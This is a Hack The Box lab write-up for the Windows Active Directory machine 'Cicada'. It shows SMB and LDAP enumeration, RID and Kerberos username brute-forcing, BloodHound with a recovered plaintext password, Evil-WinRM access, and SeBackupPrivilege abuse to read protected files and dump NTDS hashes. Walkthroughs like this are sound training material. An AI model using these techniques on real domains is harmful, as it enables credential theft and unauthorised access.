Write-Ups
  • Intro
  • Active Directory
    • HTB | Forest
    • HTB | Sauna
    • HTB | Active
    • HTB | Blackfield
    • HTB | Resolute
    • HTB | Cascade
    • HTB | Cicada
    • HTB | Administrator
    • HTB | Authority
    • HTB | Office
  • Windows
    • HTB | Devel
    • HTB | Chatterbox
    • HTB | SecNotes
    • HTB | Access
    • HTB | Jeeves
    • HTB | Artic
    • HTB | Bastard
    • HTB | Bastion
    • HTB | Querier
  • Linux
    • HTB | BoardLight
    • THM | CMess
    • THM | ConvertMyVideo
    • HTB | Editorial
    • HTB | Mirai
    • HTB | Nibbles
    • HTB | Help
    • HTB | SwagShop
    • HTB | Jarvis
    • HTB | Sea
    • HTB | Chemistry
Powered by GitBook
On this page
  • NMAP
  • SMB & RPC
  • LDAP - TCP 389
  • Foothold/shell
  • Bloodhound/ ldapdomaindump
  • Priv Esc
  • SeBackupPrivelege
  • Beyond root.txt
  1. Active Directory

HTB | Cicada

PreviousHTB | CascadeNextHTB | Administrator

Last updated 5 months ago

This is a Windows box. You can find it here.

Skill Learned

  • ldapdomaindump / bloodhound

  • SeBackupPrivelege

NMAP

IP: 10.10.11.35

nmap -sT -p- --min-rate 10000 10.10.11.35 -Pn
nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,59969 10.10.11.35 -Pn

SMB & RPC

smbclient -L 10.10.11.35 -N

There was a file in the HR share

smbclient //10.10.11.35/HR

Since we have a password we can enum for the user

LDAP - TCP 389

ldapsearch -H ldap://10.10.11.35 -x -s base namingcontexts

Foothold/shell

Without creds, one thing I can check for is usernames via Kerberos brute-forcing. I’ll use Kerbrute to give this a run, and it finds four unique usernames:

./kerbrute userenum -d cicada.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.11.35

It is taking alot of time. we can use crackmapexec to brute-force rid

crackmapexec smb 10.10.11.35 -u anonymous -p "" --rid-brute

from this, we have 5 users

Let's see if the password we got has a valid user or not for smb

and we get a user michale.wrightson. Let's take a look at what share access michale have

It's the same access we have before Let's try Evilwinrm, but no luck

Bloodhound/ ldapdomaindump

Since we have valid domain cred we can use bloodhound

bloodhound-python -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -d cicada.htb -ns 10.10.11.35 -c All

Let's load the files in Bloodhound

Not able to find anything useful from the owned user (michale.wrightson)

Let's try ldapdomaindump because it gives us a nice HTML file

sudo python3 /opt/ldapdomaindump/ldapdomaindump.py ldaps://10.10.11.35 -u 'cicada.htb\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'

We found the password for david.orelious

Let's try for SMB and WinRm, we can only validate for smb

This time we have READ ONLY to DEV share

We found backup_script.ps1 in DEV share. Lets download the script to our system and take a look.

The file has cred for emily.oscar Let's try for SMB and WinRm, we can validate for both

Let's use EvilWinRM

and we are in

found user.txt

Priv Esc

SeBackupPrivelege

whoami /priv

we have SeBackupPrivelege privilege, we have seen the same privilege in Blackfield.

SeBackUpPrivilege basically allows for a full system read. This is because emily.oscars is in the Backup Operators group:

This repo has a nice set of PowerShell tools for abusing the SeBackupPrivilege. I’ll clone it, and then I’ll need to upload two files to Cicada:

Now I'll import them into my current session:

now we can copy root.txt

Copy-FileSeBackupPrivilege C:\Users\Administrtor\Desktop\root.txt root.txt

Beyond root.txt

We can copy ntds.dit and system

and transfer it to kali and use secretsdump.py from secretsdump.py we will get the hash for the Administrator.

nmap
ldapsearch -H ldap://10.10.11.35 -x -s base namingcontexts
crackmapexec smb 10.10.11.35 -u anonymous -p "" --rid-brute
user.txt
bloodhound-python
ldapdomaindump
user.txt